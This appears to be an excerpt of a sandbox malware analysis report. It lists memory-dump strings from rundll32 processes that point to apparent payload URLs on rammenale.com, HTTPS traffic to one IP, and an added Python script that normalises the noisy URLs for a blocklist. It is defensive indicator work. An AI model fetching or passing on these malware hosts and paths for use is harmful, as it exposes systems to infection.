Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F7E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.000000000881B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/-H
Source: rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/2.168.2.6
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/7
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/_T
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/fo
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.00000000034F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt$
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt)
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt2
Source: rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt4
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt4#
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt44
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt4G
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt4P
Source: rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt4W
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt4X
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt4h
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008A93000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt6634-1003
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt6634-1003.mun
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt9
Source: rundll32.exe, 00000005.00000002.3370723210.0000000003050000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3370922957.0000000003080000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3371348346.0000000003700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt:
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtA
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtC
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3369351939.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369202584.0000000000B20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369345966.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.0000000003430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369283677.0000000003300000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtC:
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000C9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtF2
Source: rundll32.exe, 0000000C.00000002.3369493253.00000000034F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtI
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtJ
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008A93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtM3
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008123000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtP
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtT
Source: rundll32.exe, 0000000C.00000002.3369493253.00000000034F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt_
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtd
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000D10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369345966.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtent
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtentties
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtf
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtfs:
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000D51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtg
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtl
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtq
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008A93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtr
Source: rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txts
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtsoft
Source: rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtu
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtx4C
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3372854058.0000000008AF7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008164000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtz
Source: rundll32.exe, 00000005.00000002.3372199010.0000000004FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclogDevice
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AF7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclogID
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclogcyS
Source: rundll32.exe, 00000005.00000002.3369108734.0000000000AB7000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369090469.00000000007B7000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclogtxt
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regM
Source: rundll32.exe, 0000000D.00000002.3371682679.0000000004D3A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3371682679.0000000004D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp%S
Source: rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp%f
Source: rundll32.exe, 00000009.00000002.3369940309.0000000003500000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp&bt
Source: rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp(f
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp0
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp0s
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp1
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp2J
Source: rundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp3
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008F7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp3bt
Source: loaddll32.exe, 00000000.00000002.2160984366.0000000000D4C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp3w
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4$
Source: rundll32.exe, 0000000D.00000002.3372381342.000000000884C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp43f
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp44uz
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4D
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008F96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4F
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4I
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4d
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4er
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4m
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4w
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4z
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007AEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp6634-1003
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008F65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp6634-1003Vbt
Source: rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp8
Source: rundll32.exe, 00000008.00000002.3369525975.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369204567.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3370380512.0000000000C20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp:
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp?J
Source: rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpBJj
Source: rundll32.exe, 00000003.00000002.2132858298.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2133337781.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3369773765.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3369384121.0000000000500000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369940309.0000000003500000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369536080.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369313271.00000000009B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.00000000009E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpC:
Source: rundll32.exe, 00000008.00000002.3373826197.000000000484A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpE
Source: rundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpG
Source: rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpK
Source: rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpOJ
Source: rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpP
Source: rundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpS
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpWJz
Source: rundll32.exe, 00000008.00000002.3369773765.00000000007BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpbS
Source: rundll32.exe, 0000000D.00000002.3369386552.0000000000A52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpent
Source: rundll32.exe, 00000009.00000002.3369940309.000000000357F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpentfc
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpgQ
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmph
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008F65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmphbt
Source: rundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpjS
Source: rundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpk
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpkJ
Source: rundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpkbu
Source: rundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpl
Source: rundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmplS
Source: rundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpm
Source: rundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpmbt
Source: rundll32.exe, 0000000D.00000002.3369386552.00000000009E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpnf
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007AEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpp
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmppv
Source: rundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpq
Source: rundll32.exe, 00000009.00000002.3369940309.00000000035C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmprI3-
Source: loaddll32.exe, 00000000.00000002.2160947833.0000000000C00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpsC:
Source: rundll32.exe, 00000008.00000002.3369773765.000000000073E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369940309.000000000357F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpsoft
Source: rundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpu
Source: rundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpuS
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008FB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F96000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.000000000884C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpz
Source: rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp~
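Most of the URLs above are not distinct indicators. The string scanner that reads the `.sdmp` process dumps runs past the terminator of the real string, so one path comes out as `regit.tmp%S`, `regit.tmpC:`, `regit.tmp6634-1003` and so on, and a few (`aclogtxt`, `regM`) are truncated copies. The only spellings that can be trusted are the two that appear intact as rundll32 command-line arguments further down, `https://rammenale.com/for2/aclog.txt` and `https://rammenale.com/for2/regit.tmp`, so the memory strings should be folded onto those before anything goes on a blocklist. The script below is an added example of that normalisation and is not part of the Joe Sandbox report: the reference list is taken from the command lines, the sample lines are a constructed subset of the list above, and the prefix rule (the whole directory plus at least one byte of the file name must agree) is my own heuristic.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed subset of the "String found in binary or memory" lines above.
SAMPLE_LINES = """\
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclogcyS
Source: rundll32.exe, 00000005.00000002.3369108734.0000000000AB7000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclogtxt
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regM
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp%S
Source: rundll32.exe, 00000003.00000002.2132858298.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpC:
Source: loaddll32.exe, 00000000.00000002.2160984366.0000000000D4C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp3w
"""

# Reference URLs: the two that appear intact as rundll32 command-line arguments.
# A command line comes from the process creation record, not from a memory
# over-read, so it is the trustworthy spelling.
CANONICAL_URLS = (
    "https://rammenale.com/for2/aclog.txt",
    "https://rammenale.com/for2/regit.tmp",
)

STRING_RE = re.compile(r"String found in binary or memory: (\S+)")


def extract_memory_urls(report_text):
    """Pull the raw URL candidates out of the report lines."""
    return STRING_RE.findall(report_text)


def _common_prefix_len(a, b):
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def canonicalize(noisy, canonical=CANONICAL_URLS):
    """Map one noisy memory string onto a reference URL.

    Returns (url, kind): kind is 'exact', 'trailing' (reference URL followed by
    over-read bytes), 'partial' (agrees through the directory and into the file
    name, i.e. a truncated copy) or 'unmatched' with url None.
    """
    best, best_len = None, 0
    for ref in canonical:
        if noisy == ref:
            return ref, "exact"
        if noisy.startswith(ref):
            return ref, "trailing"
        n = _common_prefix_len(noisy, ref)
        if n > best_len:
            best, best_len = ref, n
    # Heuristic (mine): accept a partial only if the whole directory part and at
    # least one byte of the file name agree; a shared "https://" proves nothing.
    if best is not None and best_len > best.rfind("/") + 1:
        return best, "partial"
    return None, "unmatched"


def summarize(report_text, canonical=CANONICAL_URLS):
    """Fold all memory strings onto reference URLs and count hits per URL."""
    hits, kinds, hosts, unmatched = Counter(), Counter(), set(), []
    for raw in extract_memory_urls(report_text):
        hosts.add(urlsplit(raw).hostname)
        url, kind = canonicalize(raw, canonical)
        kinds[kind] += 1
        if url is None:
            unmatched.append(raw)
        else:
            hits[url] += 1
    return {"urls": dict(hits), "hosts": hosts, "kinds": dict(kinds),
            "unmatched": unmatched}


if __name__ == "__main__":
    for url, n in summarize(SAMPLE_LINES)["urls"].items():
        print(f"{n:3d}  {url}")
```

The `kinds` counter is the sanity check: when most strings fold as `trailing` the over-read explanation holds, while anything left in `unmatched` is a URL that never appeared on a command line and deserves its own look rather than a silent drop.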
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49713 version: TLS 1.2
